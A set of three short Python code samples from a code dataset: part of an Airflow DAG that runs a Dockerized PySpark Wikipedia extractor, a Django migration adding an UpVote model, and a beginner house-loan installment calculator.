'retries': 1,
'retry_delay': timedelta(minutes=5)
}
dag = DAG(
'Wiki_Analyzer',
default_args=default_args,
schedule_interval=timedelta(days=20))
def validate_connections(**context):
    # provide_context=True makes Airflow pass the task context as keyword
    # arguments, so the callable must accept them.
    print("Connections validation code goes here")
validate_connectivity = PythonOperator(
task_id='validate_connectivity',
provide_context=True,
python_callable=validate_connections,
dag=dag,
)
extract_wiki_data = BashOperator(
task_id='extract_wiki_data',
bash_command='docker run --network=host -v $(pwd):/job godatadriven/pyspark --name "Wiki Extractor" --master "local[1]" --conf "spark.ui.showConsoleProgress=True" --jars /job/libs/* --conf spark.cassandra.connection.host=localhost /job/code/spark_reader_server.py',
dag=dag,
)
validate_connectivity >> extract_wiki_data
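# Usage note: with this file placed in $AIRFLOW_HOME/dags, a single task can be
# exercised outside the scheduler via the Airflow 1.x CLI (the 1.x-style
# operator imports above suggest that version); the date is an execution date:
#
#     airflow test Wiki_Analyzer validate_connectivity 2020-07-28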
|
StarcoderdataPython
|
4810811
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-12 03:42
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('swot_item', '0003_auto_20170912_0321'),
]
operations = [
migrations.CreateModel(
name='UpVote',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.RenameModel(
old_name='SwotItem',
new_name='Item',
),
migrations.AddField(
model_name='upvote',
name='item',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='swot_item.Item'),
),
]
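# Usage note: this migration was generated by Django's makemigrations; it is
# applied with the standard management command for the app named in the
# dependency above:
#
#     python manage.py migrate swot_item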
|
StarcoderdataPython
|
73989
|
<reponame>matheusmiguelsa/Exerc-cios-de-Python<gh_stars>0
v = float(input('Value of the house to be purchased: R$'))
s = float(input("Buyer's salary: R$"))
qa = float(input('How many years to pay it off: '))
print('To pay for a R${:.2f} house over {:.0f} years'.format(v, qa), end='')
print(' the monthly installment will be R${:.2f}'.format(v / (qa * 12)))
if v / (qa * 12) >= s * 0.3:
    print('Your loan was denied, sorry')
else:
    print('Your loan was approved, congratulations!!')
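# Worked example (illustrative figures): a R$200000.00 house over 20 years
# gives an installment of 200000 / (20 * 12) = R$833.33; with a salary of
# R$3000.00 the 30% ceiling is R$900.00, so the loan would be approved.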
|
StarcoderdataPython
|